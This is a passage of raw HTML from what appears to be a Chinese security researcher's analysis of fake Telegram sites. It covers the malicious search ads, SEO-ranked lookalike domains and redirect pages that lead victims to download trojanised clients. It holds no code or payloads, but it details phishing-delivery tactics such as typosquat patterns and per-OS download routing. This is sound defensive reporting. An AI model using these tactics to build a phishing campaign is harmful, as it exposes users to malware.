0px;font-weight: bold;color: black;font-size: 18px;"><span style="display: none;"></span>Bing 搜索结果<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">搜索结果中可以看到域名为 www.bing.com</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.46405228758169936" data-s="300,640" style="" data-type="png" data-w="1071" src="https://wechat2rss.xlab.app/img-proxy/?k=0182ac73&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzVrflyxm5ibPStrrkUR0Kl5tcfU18QX86ZG3pLH3dOHuGV4lx045br0w%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">点击后发现攻击者同样是想通过site语法来限定搜索结果为特定的假冒官网地址</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.41203703703703703" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=6f224394&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzIQmkkTnB3UTbib0MvfNqOJY7iaq0R5zYkDJTkrBf3BHz8roPOdvvqmpw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是由于上文提到过的疑似特殊原因，使用Bing中转似乎不是一个很稳定的选择</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.387037037037037" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=96ebc8e5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzKAMNIUd1EiaVpicu9w4qT9wIX9ia3WE2kPb31SM35x7dQPBibsSy07yA2w%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>直接跳转假冒官网<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">有时也能看到攻击者直接将自己搭建的假冒官网作为推广地址的案例</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5037037037037037" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=3b9b62c1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzSPn2XWySpXB5W3reCD8EzEkzqiaN1FxLVdMibYeYuvY4bUlI1WQTOfVQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">用户在搜索页面点击搜索结果后，会直接跳转到假冒官网地址</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6453703703703704" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8359e962&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzIN4jzibV3RLcpPGia26LS35sGD6wv6KY7jXgqStyAy8FuNwpoE17ZMIg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">假冒的telegram官网域名当中绝大多数围绕 ”telegram“ 这个关键字，但是也能见到少数没有规律的域名作为推广结果的案例。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.34441087613293053" data-s="300,640" style="" data-type="png" data-w="993" src="https://wechat2rss.xlab.app/img-proxy/?k=d6693401&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzgeTpwEV1APicaAbeJkBGobeFbqjJia5KYqG5APMYDcwnaicVOCmuglZyQ%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>小众搜索引擎<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">像 www.discovertoday.co 、hk.top10quest.com 这类的域名具备搜索引擎的功能，但是又没有听说过的网站，我暂且称之为 ”小众搜索引擎“，该类网站的特点是 ”也具备广告位的设定，并且广告特别多“。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6898148148148148" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=0564a08c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTz83dCJLlhrMVV7yfSy4bjExN8RImV5icHuNBQ3IU9BdRaZaXiaLeAqiazg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">Google搜索钓鱼广告中也曾出现过利用这些 ”小众搜索引擎“ 二次跳转的案例。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.9666666666666667" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=d6ef2895&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzP9OppxC17BgvExeh9ib40smw1fW9vFDwVDStJUJnAcwtAcAxfCgg0Qg%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"><br/></figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.525" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=81d36c7f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzf4N26QnTduHxnQMqTBs9lFib0MRLPdr6GxrEaN1s2QZD8S75bnnyEag%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"><br/></figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5527777777777778" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=b4ed32b0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzhVIkxnvd9TbgSBiaWtTicGfz9OwOEjvNpjBvy4fLO47gXDsfdiaHsJ5PQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">进入此类搜索引擎的搜索页面后，位于顶部的仍然是广告投放的恶意推广结果。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.9047619047619048" data-s="300,640" style="" data-type="png" data-w="945" src="https://wechat2rss.xlab.app/img-proxy/?k=2e056720&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzoY8duv31Oq8WoRkp6FFHJPTUzFmHzQbn11PZWXonib2Aibv3nCfHAyUg%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"><br/></figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.8416666666666667" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=ab1632e7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzuNVpVVd8dyfldWL1UPk6wosLs18DRmRARJUBYIONH0tJVKv7wJ0ZxA%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>印象笔记<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">跟踪过程中也曾经发现印象笔记被攻击者短暂的利用过一段时间，即 www.evernote.com 的域名会出现在推广广告列表中。但是不知道出于何种原因，现在基本已经看不到这种中转方式了。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.17777777777777778" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c872c764&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzMXIqejo6btNdJ9EdicXibE6OlrNP02vjmc5TiaZAOF0L870wCkzOJrKiaw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">利用思路与Google文档类似，都是利用文档服务制作一个假装推广telegram的展示页面，诱导用户点击下载链接。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.7018518518518518" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=d0cd0c76&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzIt9WBhiaVXicdsIPeKJzOBibbxVicPcddpBTC2P2FGYGRhlTLPRr8PRxBg%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>telegram关键字网站<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">该类型搜索结果与广告投放无关，一般出现在除广告推广结果、真实telegram官网之外的位置。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.675" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=247aa39e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzZsT8MRGglF1sgcs8bV6Q0oOU34nmJP8h67ibF8RZTDsWgAROldQdpPQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">此类假冒网站基本可以分为两种工作原理：</p><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: decimal;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">网站本身主打的就是 ”telegram官网“，通过各种SEO方式将网站排名优化的特别靠前，如果用户直接忽略掉了推广结果浏览下方搜索结果，或者用户使用了广告屏蔽浏览器插件等，就很容易点击进入此类假冒官网下载假冒的客户端。</p></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6712962962962963" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=5c9d4dc0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzrFhXSLKVCGUDKlOBr6oW7Z53v0QM2cib740vKokl06s5K6g1lHTZTSw%2F640%3Fwx_fmt%3Dpng"/></p></li><li><p><br/></p><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">网站定位是主要围绕 ”telegram“ 这个关键字的资讯类网站，本身并不提供下载服务，但是很容易被搜索相关资料的用户点进去，网站上一般在顶部或者其他位置放置真正的假冒官网的跳转地址，诱导用户点击。</p></section><p><br/></p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><br/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.649074074074074" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=919e8073&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzzs1MfUTOsjgfaDeKYk5vDcwKHnKK9Hibib7oCPiaflJSE8amibGIojSzCA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5814814814814815" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=59d842a4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzDbHqQhNXIsnDp5VgxMr8FwI1Wg0OPBEehdMGA78shyUkRIQMngzY4g%2F640%3Fwx_fmt%3Dpng"/></p></li></ol><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>被SEO利用的无关站点<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">这种情况多数是站内的search功能被黑帽SEO滥用了，最终效果就是大型的网站被利用来做黑灰关键字的推广。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.8055555555555556" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a2c06664&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzicnsCqo3ygwJI4XDJvq9hibkTIeIULHlUERDcldyN9gaicvvzDcHCKoog%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>疑似Google商店<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">在观察排名靠前的几个telegram关键字时，发现 “纸飞机群组” 这个关键字可以搜索到一个排名比较靠前的Google Play的结果。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.1925925925925926" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=b975211a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzdict5sEF2Yib6oGUOdk7FNkZYO20Sxg3m6siaic5tHzm4v3fULdVVSIejw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">软件icon跟名称来看，主打 “中文”、&#34;福利&#34;，并且该软件似乎也只是谷歌应用商店当中上架的非官方app之一。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6203703703703703" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=f18f2adb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzy7ib7OvdACgVy2dum4c8J4xq80zEsYGSlRrWhK4Y3K67vN9icoI1v9icA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">关于该软件的比较有意思</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.4139004149377593" data-w="964" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=7e73a9e2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh3n3odHZ1XrtibibkqN4CR6icL9ian66uOdjuyrQXYI7JNPuIicvwwqRCoemZncI4TKrIMhsq0U39Mm5Vg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.5213219616204691" data-w="938" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=83cf22c0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh3n3odHZ1XrtibibkqN4CR6icLtxm5VMUV38lFW2pu43E2O8xHww9iapEZUpyDjXwbf3P6PXKt7mQYOibw%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.36619718309859156" data-w="1065" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=4c423162&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh3n3odHZ1XrtibibkqN4CR6icLelSicvb5CHQCbricJ70EkNXQvr2CpmZlEP1qPQY8DYdsqZuBot0GvvIA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.6759259259259259" data-w="1080" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=df796d5b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh3n3odHZ1XrtibibkqN4CR6icLSKibfyKFnYSthGCiaMvaFVNVmwia1U0G7jU6ZHlvynI63Mdb7xPk7eeJQ%2F640%3Fwx_fmt%3Dpng"/></p></figure><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>中转页面跳转</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">用户在搜索引擎给出的搜索结果中点击了不可信的内容后来到中转页面，中转页面一般还会有至少一次跳转，中转页面的跳转涉及多个维度的信息，概括如下。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>自建假冒官网<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">攻击者搭建的假冒telegram官网是该类型钓鱼攻击当中的主战场。中招的用户将在该页面下载假冒的客户端，走完成为受害者的最后一步；防守者也将提取官网的域名、文件下载的地址进行告警和封禁。因为前面的几个步骤当中，攻击者利用的资源都是白名单资源，防守者无法有效的拦截和封禁，只有像 ”假冒官网“、”下载地址“、&#34;C2地址&#34; 这些自定义的东西才具备针对性治理的条件。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">攻击者搭建的假冒官网在视觉上一般会模拟真实官网的形态，偶尔也有一些是自创的UI，但是最终目的一定是设法让用户点击恶意客户端的下载链接，实现钓鱼。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6277777777777778" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c566e74d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTz6WpdcTFSre926taIAhpoyooTAWGV0MgLX8pqZicL7dc95pMhk8F4Tag%2F640%3Fwx_fmt%3Dpng"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 18px;"><span style="display: none;"></span>假冒官网域名特征<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">假冒官网的标配就是模拟 ”telegram“ 这个关键字的相似域名，攻击者的手法基本围绕 ”冷门后缀“、”字母移位“、”单词缺字“、”重复字母“、”相似字母替换“、”加单词造域名“ 这些，此处不赘述。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.32685185185185184" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=4abc1efc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzMdw1UzY3RMNOHtgicvJpUry3UnrEz2stzZe2dEr9ojuEO3uq4dcSMVw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">不过需要注意的是，有几个telegram官方的域名不是很常见，有时候会混杂在攻击者的假冒官网当中，需要关注下避免误封的问题。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRoh1cJ9oEONNca6ibN1Dc5pXKfKSHZhjUZZyvIQn5eBns3j4DoP0SlcRg4UE8Gibvicayy3aGAyw20JgqJ8xXXvDmA/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">telegram.com<br/>cdn4.telegram-cdn.org <br/>updates.tdesktop.com <br/>web.telegram.org<br/></code></pre><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 16px;"><span style="display: none;"></span>在线快速建站服务<span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">甲方一般都遇到过使用ipfs域名、国外快速建站域名等服务发钓鱼邮件的，一般这种域名都是个壳，实际收信的地址在远端。fake tg 同理，例如：</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6231481481481481" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=85093860&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzxttRQG7PX0uus1bnK7IibADnrDd8yImD9lKalMiaw3yst84ttG8CL4dA%2F640%3Fwx_fmt%3Dpng"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 18px;"><span style="display: none;"></span>客户端选择<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">进入官网后一般就是客户端的选择下载，比较常见的大多数情况是攻击者主打Windows系统的假冒客户端，所以剩下的几个系统的下载地址均设置为跳转telegram官方的下载地址。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4722222222222222" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=e508d4ed&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzqucv7QavqMJFhX1xeTK6NJey3ybUFmm5EjqogGONgdicia9KXRykkg1g%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">或是攻击者主打安卓系统的假冒客户端，网站尺寸都仅为移动端设置，除安卓下载地址外其他系统下载地址返回官方下载地址。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3814814814814815" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a64b5917&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzqArkaZI3Fvg4BkkWnibVvtZ10iapMCqsTW7icCnibLtuuQAYZWbyP7BXnQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">剩下的情况基本就是无论点击哪个类型的下载按钮，返回的都是攻击者设置好的下载地址，文件类型都是固定的。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4898148148148148" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=174ef41e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzEITwMDK0kM8BMJlcibPMt7YR4DzZzGHykT3AvyByU9XmOKu1aCiaiaWLg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">另外分析过程中有遇到过比较特殊的情况，攻击者为IOS系统也准备了相应的假冒客户端，下载地址是自签app的托管页面，会要求用户信任描述文件。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.2675925925925926" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=060ee5cf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzFkia1lVInRnhlFGnAgA4YiaTGKgTyxicm04hQZ7GgS5bcJhWQMjr9wmcQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.37222222222222223" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=7791e8a5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzT22t50ZMYXy1n0Q61U8icGcKnNmf7cTSweTypeVXXo2UaHGiaiaOkTzeg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.0824074074074075" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=5ff35d01&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzM7V05h78ftXRwtyAlISKcic0NSR2PhmfoFLOVZeesXwj3wkKDmK85OQ%2F640%3Fwx_fmt%3Dpng"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 18px;"><span style="display: none;"></span>下载功能<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: 